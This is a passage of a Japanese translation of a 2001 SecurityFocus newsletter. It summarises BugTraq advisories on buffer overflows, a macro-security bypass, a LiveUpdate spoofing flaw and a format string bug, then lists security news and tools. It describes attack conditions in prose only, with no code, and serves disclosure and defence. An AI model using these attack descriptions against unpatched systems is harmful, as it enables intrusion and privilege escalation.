BugTraq ID: 3399
リモートからの再現性: 未詳
公表日: 2001-10-01 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3399
まとめ:

HP Network Node Manager は、Hewlett-Packard により提供される商用のシス
テム管理ソフトウェアパッケージである。
Network Node Manager (NNM) にはユーザが権限を昇格可能な問題が発見された。
この問題は長いホスト名を取り扱う際に生じる。
OpenView が 256 バイトよりも長いホスト名を受け取った場合、バッファオー
バーフローが発生する。このため、任意のプログラムの実行が可能になり、ホ
スト上での権限昇格の可能性をもたらすのである。

この弱点の再現がローカルのみなのか、あるいはリモートからも可能であるの
かについては HP は明言しておらず、詳細については不明である。

22. HP-UX RPCBind Random Buffer Overflow Denial of Service Vulnerability
BugTraq ID: 3400
リモートからの再現性: あり
公表日: 2001-10-01 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3400
まとめ:

HP-UX は、 Hewlett Packard により提供および管理されている Unix の 1 実
装である。

rpcbind の実装にある問題のため、リモートユーザは rpc に依存したサービス
を利用するユーザを DoS に陥らせることが可能である。悪意ある RPC リクエ
ストにより、portmapper をクラッシュすることが可能である。原因はバッファ
オーバーフローによる可能性がある。
この状況はリモートのユーザがサービスを攻撃する事を可能とし、例えば NIS
のような RPC に依存したサービスを利用するシステム上の他のユーザのアクセ
スを妨害する事が可能である。

問題発生の条件の一つは、HP により「ランダムなバッファーオーバーフロー」
として説明されており、システムが高負荷下にある際に発生する。プログラム
の実行が可能かどうかは未詳である。

23. Cerulean Studios Trillian Denial of Service Vulnerability
BugTraq ID: 3401
リモートからの再現性: あり
公表日: 2001-10-03 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3401
まとめ:

Cerulean Studios Trillian は様々なインスタントメッセンジャープログラム
を一つのインターフェイスで同時に使用することが可能なチャットプログラム
である。Trillian は AIM、ICQ、Yahoo! Messenger、MSN Messenger、IRC をサ
ポートする。
Trillian と AOL Instant Messenger (AIM) の組み合わせには、Trillian クラ
イアントが応答を停止してしまう問題が存在する。

文字の種別によらず大量の文字 (640文字以上) を含んだ AIM インスタントメ
ッセージを作成して送信し、Trillian を使用しているクライアントにより受信
されることによりこの問題を利用する攻撃が可能である。通常機能への復旧は、
アプリケーションの再起動が必要である。

この問題の原因は未チェックのバッファである可能性がある。もしもそうであっ
た場合、弱点のあるターゲットホスト上で任意のプログラムの実行される可能
性がある。しかし、現在の所、そうであるかは確認されていない。

24. Microsoft Excel and PowerPoint Macro Security Bypass Vulnerability
BugTraq ID: 3402
リモートからの再現性: なし
公表日: 2001-10-04 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3402
まとめ:

Microsoft Excel と PowerPoint には、マクロに関するセキュリティチェック
機能がある。この機能により、ユーザが開こうとするドキュメントにマクロが
埋め込まれていないかどうか確認するために検査する。その際、セキュリティ
の設定により、ユーザはマクロを実行するかどうか尋ねられるか、あるいは、
マクロが自動的に無視される。
通常ありえない Excel あるいは PowerPoint 文書を作成することにより潜在的
にこのマクロのセキュリティ機構を回避することが可能で、マクロをユーザの
許可なく実行してしまう。このため、攻撃者にマクロに悪意あるコードを埋め
込むこと許し、そして、ターゲットホスト上で実行される。このプログラムは、
現在ログイン中のユーザ権限で動作する。

このようなドキュメントがマクロを実行させるためには攻撃対象のユーザによ
りドキュメントが開かれなければならない。

25. Symantec Norton Antivirus LiveUpdate Host Verification Vulnerability
BugTraq ID: 3403
リモートからの再現性: あり
公表日: 2001-10-05 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3403
まとめ:

Symantec が提供する Norton Antivirus には、LiveUpdateと呼ばれている機能
がある。LiveUpdate は、Symantecサイトに新しいウイルス定義があるかどうか
調べ、インターネット経由でダウンロードして、インストールするプログラム
である。このプロセスは自動的に、あるいは手動で実行することが可能である。
しかし、Symantec による Norton Antivirus LiveUpdate 実装には設計上の欠
陥が存在するのである。
これはユーザのシステム上で LiveUpdates を実行する際、暗号処理 (デジタル
署名、公開鍵、証明書) を実行する事ができないという問題である。
LiveUpdate を実行しているホストの確認行為に Norton Antivirus は失敗して
しまうためにリモートホストが未知のユーザに悪意ある LiveUpdate を送る事
が可能なのである。
この状況はリモートユーザが LiveUpdate を行うための接続 (update.symantec.com)
を任意のサーバにリダイレクトした場合に実行可能である。この状況は DNS
データの内容改変、DNS 偽装などによって実行可能である。接続がリダイレク
トされている際、不正なサーバはターゲットに Norton Antivirusがホストの正
当性を確認させずに、ダウンロードする任意のファイルを送り始める可能性が
ある。
この問題の利用は自動実行に設定、あるいは手動実行された LiveUpdate に関
係なく可能である。

この問題を利用する攻撃に成功した場合は、リモートからの攻撃者はターゲッ
トホスト上で多様な行為を行う事が可能である。最悪の場合、この問題はター
ゲットシステムを完全な危険にさらすことに繋がる可能性がある。

26. Progress Database Multiple Buffer Overflow Vulnerability
BugTraq ID: 3404
リモートからの再現性: なし
公表日: 2001-10-05 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3404
まとめ:

Progressは、Microsoft Windows と Unix 向けのの商用データベースである。
ローカルに利用可能なバッファオーバーフローが、多数の Progress データベ
ースを構成するプログラムに存在する。これは、主として外部に strcpy 関数
に与えられるデータに関する境界チェックが不十分であるために生じる。
これらの問題を利用し、ローカルの攻撃者が影響を受ける個々のプログラムの
権限で、ホスト上で任意のプログラムを実行する可能性がある。

バッファがオーバーフローさせられた場合、リターンアドレスを含むスタック
変数は上書きされ、悪意のあるユーザがホストの上で任意のプログラムを実行
状況を招いてしまう。この際、プログラムが setuid root に設定されている場
合、攻撃者は root に権限を昇格可能である。

このような状況は、ホスト上で攻撃者による root 権限の奪取を招く可能性が
ある。

27. Progress Database JvmStart Format String Vulnerability
BugTraq ID: 3405
リモートからの再現性: なし
公表日: 2001-10-05 00:00:00
関連する URL:
http://www.securityfocus.com/bid/3405
まとめ:

Progressは、Microsoft Windows と Unix 向けのの商用データベースである。
jvmStartは、Javaバーチャルマシンを起動するためのrogressデータベースに含
まれるプログラムである。jvmStart には、書式文字列攻撃を受けてしまう入力
の妥当性確認エラーが存在する。これは外部から入力されたデータが書式文字
列への引数として *printf 関数に渡される文字列に含まれてしまうためである。
攻撃者は、任意の値でメモリ中の任意の場所を上書きするために、この条件を
利用する事が可能であり、潜在的に攻撃者がホスト上での任意のプログラム実
行を可能にしてしまうのである。このような状況は、ホスト上で攻撃者による
より高い権限の奪取をもたらす可能性を招く。

III. SECURITYFOCUS.COM NEWS AND COMMENTARY
- ------------------------------------------
1. Zero-Knowledge to Close Anonymity Service
著者: Will Rodger

洗練されたプライバシネットワークは暗号パンクの風潮への信頼を心強いと考
えている。しかしそれを享受できるのは一部の消費者だけなのだ。

http://www.securityfocus.com/news/262

2. House Panel Approves Expanded Surveillance Powers
著者: David McGuire, Newsbytes

反テロ愛国者法が司法委員会で満場一致で通過された。

http://www.securityfocus.com/news/261

3. Alternative Anti-terror bill limits life sentence for hackers
著者: Kevin Poulsen

司法局がコンピュータへの不正アクセスを執行猶予の可能性を与えずに容疑者
を禁固可能である、合衆国に対するテロ犯罪とみなす計画を推進できる様にす
るために、今週議会の司法委員長により提案された反テロ法は決議が行われな
かったのである。

http://www.securityfocus.com/news/260

4. A Battle-Ready Net?
著者: Alex Salkever

まだ明らかにはなっていないが、物理的な強襲やサイバー攻撃のいずれかに対
して、さらに防衛に努める事が正に求められているのである。

http://www.securityfocus.com/news/259

IV.SECURITY FOCUS TOP 6 TOOLS
- -----------------------------
1. libsmbpw v1.3
作者: Andy Phillips
関連する URL:
http://www.pergamentum.com/~atp/software/libsmb/
プラットフォーム: N/A
まとめ:

libsmbpw は samba の暗号化されたパスワードファイル (smbpasswd) でエント
リの読み出しと書き込みを行うためのルーチンの getpwent/putpwent/endpwent
を提供する小さなライブラリです。samba 2.0.5a のコードを元に作成されてい
ますが、コンパイルをするために samba のコードは必要ありません。

2. GPG Keys v0.2.0
作者: Peter Mathiasson
関連する URL:
http://www.mathiasson.nu/
プラットフォーム: N/A
まとめ:

GPG Keys は、Qt 3 ライブラリを利用して作成された GPG の GUI フロントエ
ンドです。このソフトウェアにより鍵の管理を簡単に行う事ができるようにな
ります。鍵サーバはアップロード、検索、鍵のインポート機能をサポートしま
す。

3. grsecurity v1.8
作者: spender
関連する URL:
http://www.getrewted.net/
プラットフォーム: Linux
まとめ:

grsecurity は、2.4 カーネルに組み込む hap-linux と openwall のコードを
元にセキュリティパッチを一まとめにしたものです。スタック上でのプログラ
ムの実行の禁止、/proc の禁止、chroot の禁止、リンクや名前つきパイプの禁
止、exec や set*id のロギング、セキュアなファイル記述子、ステルスネット
ワークの強化、シグナルロギング、失敗した fork のロギング、時間変更ロギ
ングなどの機能があります。

4. XOR Cipher Analyzer 0.3
作者: Marvin, marvin@nss.nu
関連する URL:
ftp://ftp.nss.nu/pub/synscan/xor-analyze-0.3.tar.gz
プラットフォーム: Linux、Solaris、UNIX
まとめ:

XOR-analyze は、簡易な暗号を解読する (破る) プログラムです。鍵の長さの
変更が可能で暗号化復号化プログラムを含みます。

5. mcrypt v2.5.9
作者: Nikos Mavroyanopoulos, nmav@hellug.gr
関連する URL:
http://mcrypt.hellug.gr/
プラットフォーム: Linux
まとめ:

mcrypt はファイルやバイトストリームを暗号化するためのプログラムです。
これは UNIX の古い crypt の置き換えとなることを意図されています。CBC
や CFB などいくつかのモードで、DES、BLOWFISH、TWOFISH、ARCFOUR、CAST-128
など有名で十分テストされている暗号を使用しています。また、UNIX の古い
crypt と Solaris の DES との互換性モードも使用できます。

6. gShield v2.7.1
作者: R. Gregory, godot@mindspring.com
関連する URL:
http://muse.linuxmafia.org/gshield.html
プラットフォーム: Linux
まとめ:

gShield は 2.4.x Linux カーネルに組み合わされて利用される iptables を
利用するファイヤウォールです。意欲的なデフォルト状態で提供され、BSD 形
式の容易に設定可能な設定ファイルが提供されています。また、NAT サポート
や様々なサービスへのアクセスコントロール機能、組み込み済のポートフォワー
ディング、透過型プロキシサポート等の機能が提供されています。
このソフトウェアは広範囲にファイヤウォールの管理を用意にする事を可能に
する事をねらいとしています。

新機能には以下が含まれます:
・問題を生じない動的あるいは静的 IP アドレス取り扱い機構
・選択可能な IP マスカレーディング機構の有効化
・TCP_Wrappers 類似の機能サービスへのアクセスコントロール機能の提供
・デフォルトで公開されているサービスのみがアクセスコントロールの対象
  という広範囲にまたがるデフォルト設定
・多くのコメントが追加された BSD 形式の設定ファイルによる容易な設定
・スクリプト内のユーザが定義したルールセットの組み込み機能の提供
- --
Translated by SAKAI Yoriyuki, KAGEYAMA Tetsuya
Supervised by SAKAI Yoriyuki
LAC Co., Ltd.
http://www.lac.co.jp/security/

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Edition 5.5.5J

iQA/AwUBO8ptgJQwtHQKfXtrEQKUIwCg/gFcodVWB7Z/1cEa5TR9nPOBAgYAnRD8
7vIDvLZ2N/x/kBITjTMlarQN
=Jzgx
-----END PGP SIGNATURE-----